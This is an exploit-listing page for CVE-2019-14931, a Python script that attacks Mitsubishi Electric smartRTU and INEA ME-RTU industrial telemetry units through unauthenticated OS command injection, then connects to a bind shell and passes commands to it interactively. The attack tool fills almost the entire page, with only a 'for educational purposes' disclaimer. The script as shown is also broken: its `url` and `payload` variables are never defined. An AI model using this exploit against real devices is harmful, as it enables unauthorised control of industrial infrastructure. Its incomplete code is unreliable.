Mitsubishi electric smartrtu / inea mertu unauthenticated os command injection bind shell Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2019-08-12 |
Type : webapps |
Platform : php
This exploit / vulnerability Mitsubishi electric smartrtu / inea mertu unauthenticated os command injection bind shell is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#!/usr/bin/python
# Exploit Title: Mitsubishi Electric smartRTU & INEA ME-RTU Unauthenticated OS Command Injection
# Date: 29 June 2019
# Exploit Author: (@xerubus | mogozobo.com)
# Vendor Homepage: https://eu3a.mitsubishielectric.com/fa/en/products/cnt/plcccl/items/smartRTU/local
# Vendor Homepage: http://www.inea.si/en/telemetrija-in-m2m-produkti/mertu-en/
# Firmware Version: Misubishi Electric 2.02 & INEA 3.0
# CVE-ID: CVE-2019-14931
# Full write-up: https://www.mogozobo.com/?p=3593
import sys, os, requests, socket
os.system('clear')
print("""\
_ _
___ (~ )( ~)
/ \_\ \/ /
| D_ ]\ \/ -= Bind_Me-smartRTU by @xerubus =-
| D _]/\ \ -= We all have something to hide =-
\___/ / /\ \\
(_ )( _)
@Xerubus
""")
host = raw_input("Enter RTU IP address: ")
port = raw_input("Enter bind shell port number: ")
print "\n[+] Building payload"
print "[+] Sending payload"
print "[+] Attempting connection to smartRTU"
try:
r = requests.post(url, data=payload, timeout=1)
except:
pass
port = (int(port))
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
try :
print "[+] Connected to the smartRTU!\n"
while 1:
cmd = raw_input("(smartRTU-shell) # ");
s.send(cmd + "\n");
result = s.recv(1024).strip();
if not len(result) :
print "\n[!] Play nice now skiddies....\n\n"
s.close();
break;
print(result);